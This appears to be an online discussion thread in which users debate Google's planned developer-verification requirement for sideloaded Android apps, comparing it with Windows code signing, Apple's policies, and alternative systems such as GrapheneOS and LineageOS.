I truly don't get it. Are these people from 2009? Have they seen the apps on the current app stores? If you're lucky your highest rated flashlight app will only have a few Fullscreen ads and a subscription less than $10/mo. The recipe sites from content farms are less bloated and way less scammy.
It's certainly not about preventing scams. It's about preventing competition in the scamming business.
> According to its own survey, Google says that more than 50 times more malware came through internet-sideloaded sources compared with Google Play, where it has required developer verification since 2023.
50:1 is not preventing. It is just "well, we are better than nothing"
I'm pretty sure there can be other curated stores that can serve the customer¹
[1] customer: owner of phone, not advertisers, data merchants, etc
I regard Google highly in many domains, but this needs independent research. There is just waay too much opportunity to misuse data to paint a picture of themselves as the protectors. Especially curious about their definition of malware, because to me the app stores seem worse than browser toolbars from the 2000s.
I tried to screenshot some app on my android the other day and got an error toast reading some bullshit like "this action has been blocked by the admin." Uh I'm the admin and this is my hardware... The sketchy app was trying to prevent screenshots.
Vollo from German is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
For once Fairphone never updating their phones will work in our favor! If Google roll sthis out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
I have Android 15 on my work phone and 10 in private. I don't really see the difference besides that they've made it more annoying to turn wifi off (requires an extra tap now, first the general internet menu and then a small slider for wifi or mobile data). Genuinely not seeing any significant changes from a user point of view (I'm sure there's lots of new SDKs for the developers, but while I've made apps before, I'm not a mobile dev keeping up with the latest things)
That Fairphone has 13 just tells me they don't waste employee time in their small business on useless upgrades just for the sake of it. Their point is fair wages and ethical mineral mining: better that they have a workable phone without even more fluff, it seems to be tricky enough already in this world :(
Fairphones are also LineageOS and postmarketOS compatible, both options are without tracking and without Google's mandated policies.
LineageOS without gapps is really usable if you set aside the "big" social media apps. WhatsApp can be sourced from their website as an APK. The social apps like facebook, instagram, snap, tiktok and others all require Google Play's tracking services (aka gapps).
For YouTube there's multiple better alternative open source apps available, and mastodon, amethyst and the fediverse apps on f-droid are far superior in terms of performance to the Google Store alternatives.
I'm right there with you. These platforms are cancer. There's a small but growing movement away from smart phones. It'll probably never go mainstream, though.
Start complaining to your government about every shitty thing the apps and OSes do, and tell your friends to do it too, eventually we may get some action on it.
We are all mildly annoyed and therefore mildly motivated to fix the problem. Apple and Google are extremely highly motivated to retain the status quo. I still try to vote with my wallet but it's going to be hard to counter their well-funded lobbyists.
It's also super nice to take notes on the fly for OpenStreetMap with StreetComplete, for holding the device up to the sky and it tells you what planet is so bright in the sky, for navigation... These things don't work on a laptop. Even if you want to carry a full-sized system in place of a smartphone, or use Ubuntu Touch, I'm not aware of software to do these things in the convenient way that Android apps let you
Of course, that's a software support issue and not a constraint imposed by the OS. Someone could make Stellarium desktop work with an orientation sensor. It's just that nobody has done that particular thing, as well as a million other things that work super well on mobile
So is it second-class, or is it just a way that is optimised for output rather than input? You get the turn instructions presented to you, you can watch videos and listen to music, note-taking is optimised to work with a few taps and is reduced to the essentials you need. You can work them out later on computer if you have time at home over of course, but at least you can contribute that way with ease
I think before we can fix all that we need to revert the renting of software via subscriptions and go back to one-time-payment. But people are too greedy for that.
I cut my teeth on commercial b2c & b2b app dev/sales on Palm OS from the age of 14. It was sad but now I'm a full-time bootstrapped iOS dev thanks to that experience.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
It's incredible that by the end of it, the WM rollercoaster made us actually miss WinCE. If you had have told us that initially none of us would have believed you. WM had so much potential and was just totally botched.
Heh, I've always done this. Maybe if every mobile dev made sure I could find text like I can in a browser I'd be less strident. But really, I need a very good reason to install stuff.
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
It requires a code signing certificate from one of the trusted central authorities, and generally as an individual you must have your legal name on the code signing certificate. It's not pseudonymous.
I really wish Microsoft made it cheaper to get a certificate. With Apple you pay $100 a year for any number of certs. Last I looked into it a cert for a single Windows app costs $400+ per year and requires a hardware token.
The setup is the most insane stupid stuff I've dealt with in a while. I am currently waiting for them to agree that my DUNS number is real, and they made me remove the WHOIS privacy from my domain name to verify that my address is associated with it. The billing receipts from my host were insufficient for reasons they couldn't explain. Had to upgrade to the $30/mo and then the $100/mo support plan just to speak to someone and it's been 4 weeks without movement. But hopefully it will be worth it in the end, the EV certs are crazy expensive and don't even remove smartscreen warnings anymore.
Ugh, sorry to hear that, yeah the whole setup process is just so insanely frustrating. I'm really dreading having to re-validate my identity documents once they expire.
For what it's worth, in my experience it was even worse with EV certs though - all the same steps including removing WHOIS privacy, plus some extra ones like voice phone number validation that had to be repeated every single year.
And then there were extra WTFs with the EV cert expiration being 365 days after an issue date which is several days before you actually receive the hardware token. Or one year they sent the hardware token fairly promptly, but forget to send the password needed to use it, and it took a week to get a response from support etc. Then again, Azure Trusted Signing has similar ridiculousness with billing being based on calendar months, with no proration for your first month even if you started at the end of the month... I mean it's just $10 but it really adds insult to injury after that signup gauntlet.
Anyway, I've heard that if your Azure Trusted Signing process gets stuck in limbo, it can be best to submit a different document, but I'm not sure if there's any alternative permitted for the DUNS step. That's especially annoying because trying to update outdated info with Dun & Bradstreet is problematic in my experience, i.e. their web forms just plain did not function properly.
Yeah I was with Comodo before and it's like you said. I thought Azure signing was going to be a breeze because I've had my Azure account for years. I submitted with both EIN and DUNS and then they said I can't submit any more validation requests for this "property", so that's why I went the $100/mo support plan to get a human somewhere to click a button and approve this thing.
They saw Apple getting away with notarization under the DMA so they're doing the same.
I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
Yep. I feel powerless, and I don't know what to do. I don't think there is anything I can do, except for watch all of technology get locked down to the point that you need a monopolist's or a government's permission before you do anything with it.
It's so fundamentally depressing, and completely at odds with how I grew up viewing tech.
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
As an example of government regulation driving this change, see [1].
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
I don't know that it's that simple. Further down that section (1920) in reference [1] reads
"(3) A dedicated encrypted criminal communication device does not include--
(a) a device if--
(i) the device has been designed, modified or equipped with software or security features, and
(ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
> applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
I mean, in my country, it's increasingly unclear to me whether things like "loudly criticizing the executive branch" are now considered criminal. Recent executive branch statements on this issue seem to indicate that they may consider some critics criminal just for being critics. But it's hard to be sure. And so far, every critic they've threatened to arrest has also been accused of committing other crimes.
So "the government only considers a duress PIN illegal if it is used to facilitate crime" seems like a potentially tricky standard to apply.
At the pace of regulations we have, one day everything will be forbidden and we will all be criminals just for protecting our own wealth or security from these... yes, from these mafias.
I could use a knife to chop meat, not people; I could use a car to commute, not as a high speed bullet; I could use a gun to eliminate pests, not to kill people. Just because I can use something to do something nefarious doesn't mean it should be banned, of we should not use Internet at all because it facilitates scammers.
It is always the human mind that dictates the action, not the tool. It is futile to try and ban the tool, and I bet 100% they knew that.
This is uncanny and worryingly specific, and I'm not a lawyer, but if you're not already under suspicion of being a criminal, then installing graphene doesn't match this definition I think
Suspect, they wrote, and that happens all the time. If you go into a store on the way home from work, and 99 days this works fine but the 100th day they want to look in your bag, but you can't show them confidential drawings of the Google Pixel 14 Max that you carry as part of your work, now they'll think you really did steal something and you went from no suspicion (spot check) to definitely a suspect and new things start to apply to you, e.g. if you leave without resolving the suspicion the police might have grounds to enter your house or search you when you walk out next time. The suspicion is based on being a suspect, not on any actual evidence (nobody saw you put anything in your bag)
I mean, you don't really have to speculate about what this is for, it's for an authority providing for lawful search, it seems pretty well-scoped, and similar to any old search warrant, which is not a new thing, really https://classic.austlii.edu.au/au/legis/nsw/consol_act/deccd...
Basically, they're not really setting up for a blanket ban on personal security features, that interpretation is obviously catastrophizing. Not that there aren't hamfisted laws somewhere like this, but NSWs implementation seems OK I guess
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
> there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
Imagine that metaphorical granny that in an instant catches fire and turns into ash if the governments and large corporations don't have complete control over our lives.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
You are approaching as is the malicious developer was trying to add useful features for the users.
But in practice, these “apps that lookalike popular apps” are not intended to just be adware-less versions of the popular apps. They are frequently “hide the ads, inject the malware with more permissions” Trojan horses.
I think there is likely a dual motive from Google where they both want to stop malware _and_ stop people blocking youtube ads. The malware problem is real though.
Those "cracked" versions often require extra permissions.
My favorite was a local "discover which on your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
Did she ever get anything side loaded like that? I have downloaded malware by mistake before. Not once were they allowed to proceed with installation. The only way I got anything side loaded was if I installed the first one (which is always Fdroid) deliberately via ADB after I enabled the developer mode.
No I'm not. I asked if anyone likes Windows. These people presumably have no opinion, it's just a means to an end. The closest thing I think you'll get is "I liked Windows 7" or something like that.
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
“western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care”
Wow, how fix (WITHOUT intelligence tests as voting requirement) :(
> This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
I would say it’s really 50% platform control, 50% government regulation.
Malware is the excuse. I went, without super skill, 40 years while only contracting two viruses ever (one was Kakworm, the other was inert at the time because I was an Amiga user who kept a copy of Scorched Earth on a floppy, which never infected my Amiga).
> I predict Windows will end up going this route before Google backtracks on it.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerably driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
It is so weird to read comments based on a belief that the current government is aimed at some goal of justice. I guess they're just still drinking the Kool-aid?
Trump was a breath of fresh air talking about frustrations with the status quo that other politicians wouldn't acknowledge. But the only reason he was bringing them up was for use as a cudgel to shake down companies to enrich himself. He will very most certainly go after big tech monopolies and break them up... iff those big tech monopolies don't put bribes into his pocket. As long as his pockets get fatter, then the status quo is just peachy. It's called "making a deal".
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
For what it's worth, Venmo will not get access to your biometrics data, it's a black box in which you specify a desired level of authentication and the OS just returns ok/not ok.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
So people from countries US has sanctioned can't even develop and use mobile apps anymore. This will change millions of innocent lives. So unfair and racist. The reason my people are in this mess in the first place is a US coup.
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
> developers will have the same freedom to distribute their apps directly to users
You have here Google making a statement it can't actually fulfill and one that it knows it can't fulfill. So Google is willfully lying here.
The minute Google has a technical capability to control what applications run on Android it's out of their hands. It is in the hands of courts, governments, dictators and authoritarians. That's just the nature of the world - Google has to obey the law and Google doesn't make the laws.
I guess it sounds hysterical, but in that sense, this is an absolutely massive loss of freedom for the entire planet as communication power that rested with individual choice is now transferred wholesale back to governments by this decision.
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
If you are having random people try to attack you while you are at your home, you need to be prepared. Strengthen your door jambs with nine inch screws to replace the screws your door is mounted to and use metal plates to strengthen the locks (there are kits available at home improvement stores), install adherent plastic frosting on your windows that will slow down break ins by making the window much more annoying to break through, and install surveillence cameras outdoors. On the offensive front, you can consider OC/CS grenades you can throw down the hallway to avoid exposing yourself and handheld pepper spray for non-lethal deterrence at moderate range. Finally, if all else fails, keep a loaded handgun in a easy to use but hard for kids to unlock gun box under your drawer next to your bed. An under barrel flash light severely blinds invaders and makes them think twice about charging you, maximizing the chances that you nobody will get hurt. The door jamb upgrade is the most important one. I have returned home to a severely beaten door with my shattered iron door knocker on the ground laying in front of the door in pieces but the house was impenetrable to the burglar(s) who weren't willing to break through the glass. It also doesn't hurt to install fake $5 security dome cameras around the property.
If your app is monetized, the contact details of your "business" are shown in the play store. For many smaller developers, this will just be their home address.
That's why you have to have a business address, and get all your business admin ducks in a row, even if it's your first real monetized app. Your future self will always thank you!
I cannot resist the urge to point out that we wouldn't have had this problem if people actually sticked to free software instead of "commercial use friendly" open source licensing
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
That's fair, but a more pervasive Free Software ecosystem might have possibly avoided this outcome entirely. And that failure is something we can lay directly at the feet of the FSF.
If RMS was going to piss off the entire industry with a new version of the GPL, the least he could do was close the network hole. What we got instead is a half measure that satisfies nobody.
More importantly, he completely missed the boat on App Stores. Why was there never any watered down version of copyleft that could be used as a wedge to try and pry open app stores over time? They did it for libraries with the LGPL, but apparently app stores werent worth specials casing.
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
Free choice in the market is a lie anyhow. You are limited by what is actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to to what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all it's various apps that I trust to varying degrees.
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost a species.
I wonder if you could keep your "snitch" android phone home by instrumentalizing it, enabling you to access it remotely on your main linux/degoogled android phone. It might not even be that outrageous of an idea since there are tons of botfarms that are essentially stacks and stacks of legit phones being remotely controlled... the tech might be there already, just need to adapt if for something good...
How likely is it for google to deny access to all or most of the apis that makes this possible? Then you need to point a camera to the screen, mike the speakers and so on...
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
I just got a letter from my bank stating this. Website is going away, app only access. It's very disappointing, for security I never have any banking access on my mobile devices
I don't blame Goggle. Apple escaped anti-trust by simply not allowing anyone except themselves to put software on iPhones. Seriously, Apple doesn't allow competitors so it can't be anti-competitive according to the case.
Totally brain damaged ruling, the judge must have been molested by an Android phone at some point, but here we are, and google is now moving closer to an Apple model.
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The users gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
> we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to link someone to the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
There's an Android app called GPSLogger.[1] It does exactly what it says on the tin. Runners use it to track their own progress. Photographers use it to geotag their own photos.
The thing is, GPS access as a permission is a bit scary. You could imagine some dubious uses for it. Moreover, you could imagine some such dubious uses creating a public relations nightmare for Google. So, Google just forces them out of the Play Store. (Technically, it's a routine renewal, but the GPS permission causes them extra scrutiny, to the point where the author burned out and gave up.[2])
Do we expect that this author should, or for that matter will, give their identity to Google after this? Or is GPSLogger just dead after this change lands?
The attempts to roll out digital ID are similar to the perennial efforts to backdoor encryption. When one push fails, the proponents regroup and formulate a new approach. The recent successes with "age verification" have encouraged digital ID proponents. Expect further encroachments, scaremongering and trial balloons.
Natural incentives exist for tech majors to capture this space.
You paid for the phone with the OS as a contributing factor (alongside the hardware) to the purchase no doubt, so the OS in itself must be compelling to you for some reason.
You didn't fund the development of the OS, contribute to it (presumably), you didn't market it or position it alongside your brand.
I'd agree with you if you said you have a right to run anything on the hardware under a different OS, but you have no god given right to run whatever you want on the OS.
Looking at what's been going on in the E.U. vs. the U.S., it seems pretty clear that one of the only things companies this big, with this much control over the markets fear is regulation.
Maybe people live in a country where adding new regulations is difficult at the moment. In that case, push at for it at the state or province level. Push for it wherever you can. Suddenly these companies have to figure out how to work around 50 different state level laws? Painful. Good. Make it hurt to be evil.
People need to come together and push for regulatory roadblocks to things like this at every level. I think that's part of how you keep control of your own property and stand up against it.
It's actually your telco's phone. They're the one that has the license to run the baseband computer and RF transceiver. The 'pad' computer device is sort of yours. But there's no legal way to have ownership of a cell phone unless you yourself bid for and get the RF spectrum and set up your network in a way that accomplishes the FCC coverage and timing requirements. Then run your own telco for your phone. Basically, impossible.
Smart phones try to limit and firewall the interface between the two but tight integration is required for energy efficiency. So a smart phone, or a cell phone, can never be yours. They aren't good choices for doing computing and this legal reality is becoming more and more obvious with time.
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
A few years from now: After reviewing the usage of the approved sideloading feature, we discovered no more than 0.01% of users ever sideload an application. For security, sideloading is now disabled on all devices forever.
I'm wondering the same thing in the US. Aside from writing Google and complaining, and purchasing a phone with a different OS (GrapheneOS or PureOS, for example), I'm not sure what else to do.
The issue with that 2nd solution is, "purchasing a phone with GrapheneOS" only registers from Google's perspective as "we just sold an additional Pixel, so we're doing good right now"
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
You can buy a Linux phone today and make sure the vendors get their food on the table. Software is getting better. If you choose a phone with mainline kernel support (e.g. one that can run Mobian or PureOS), you can literally watch your OS improve month after month.
Alternatively, you can support the user-space ecosystem directly and fund the developers who make it happen.
Donate to Sebastian Krzyszkowiak [0] and Guido Günther [1] if you can!
Everytime i read a news like this i loose more hope for our world to not end up a Cyberpunk Dystopia. Like what am i supposed to do. I am just one man. One vote, one guy who isnt even to good at coding.
I wasn't aware of obtainium. Thank you. I was thinking of something more like Google Chrome mobile edition but for APKs. So more focus around the search interface.
The further into this corporatized "vision" of technology we go, the more I relate the elves in LoTR who basically said "our time is over" and then just leave Middle Earth.
There is no turning back. Generations of developers will grow up thinking every form of communication and technology by virtue of existing needs a corporate groundskeeper. Government identification will be required for most things.
I don't really blame the companies, though. Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online. What makes it all the more sour is that the very idea that things could be different is eroding away, too.
>Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online
Imagine if people felt that way about electrical power distribution? Every single thing you ever plugged in required a license to be validated at the time you tried to use an outlet?
For me, it's obvious that better ways of doing things exist, but I'm weird, and possibly a crank.
The solution, in my opinion, is to do the same thing we do with power in the home... limit the damage that can be done by anything plugged in, only giving away a limited capability for power delivery in a given outlet.
The analogous way to do this in an operating system is to discard the idea of providing all of the computing resources available to every program you run, and limit it in some way. The "permissions flags" we've all come to dread, first with UAC in Microsoft Windows, and now on our phones, obviously suck, and won't work.
The way to do it on a desktop, is to allow the user to choose exactly which resources a program may use, at runtime, by dialog boxes similar to the ones they already use, but with the additional behavior that the operating system enforces their choices, instead of just praying a program operates as intended.
On a phone, I don't have as strong an intuition, but I'm sure it can be worked out, both in a friendly, and secure way that doesn't require full time checking with consent from our betters in the corporate overlord hierarchy.
We can have secure and user friendly compute, both in our desktops, and in all our devices.
It's starting to look like I may end up with two phones. One with Lineage and most of my apps, hopefully, and another one with Play Protect which hopefully will be just my bank app. Google has become way too powerful and is encroaching step by step on our freedom, it's terrible. Tt's been going on for a long time. It's the IT equivalant of authoritarianism!!
Yeah, I think I will do that strategy as well. I will probably put Graphene on my next phone, and if any apps don't work I will keep them on another phone.
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
If you had to give away your privacy to use one and could only use helmets authorized by your motorcycle dealer you might have a point. We accept impositions on our freedom all the time when what we get in return is worth the sacrifice. If signed binaries actually delivered on their promise of keeping people safe there'd be a discussion that could be had on whether or not it'd be worthwhile, but since they don't actually protect people we'd be giving up our privacy for nothing.
"the argument that it's for our own good." is their instance that we should accept this loss of our freedom to run the software we want because it protects us. It doesn't actually protect us though, so it isn't worth it and we shouldn't accept it.
My original statement had nothing to do with motorcycle helmets, but if using them required us to give up enough of our freedoms they could also become unacceptable for the level or protection they provide (or fail to provide) us.
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
Great for you. What about the normies ? You know the people that protest and make things change, how they are going to organize themselves when their government gets authoritarian and apple/google obeys to governments request to forbid some app. You know like what happened during Hong Kong protest with Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
It's not "all fine", but realistically it's the best that you can hope to achieve.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google ( and support the decision they just made with cash money ) or.. what exactly. I am not a Apple fan either.
So where do we complain? (Aside from shaming Google on social media or writing to politicians.)
If I look through Google's contact links, it's all oriented around getting help with a problem rather than letting them know I'm going to move to something else if they go through with this. (And yes, even if Apple has the same types of restrictions on app store, if a more open alternative OS didn't work out for me, I'd move to them to punish the one dropping freedom of use.)
I knew this was coming thanks to the nincompoops bankers and IMDA together with horny uncles who fall for love/job scams here in Singapore. The reason I use android over iOS is that I can load apps for personal automation. I think the current scenario where bank apps refuse to run on phones with sideloaded apps is far more acceptable. Im not sure scammers will not find a way around this. I can still be able pin web apps.
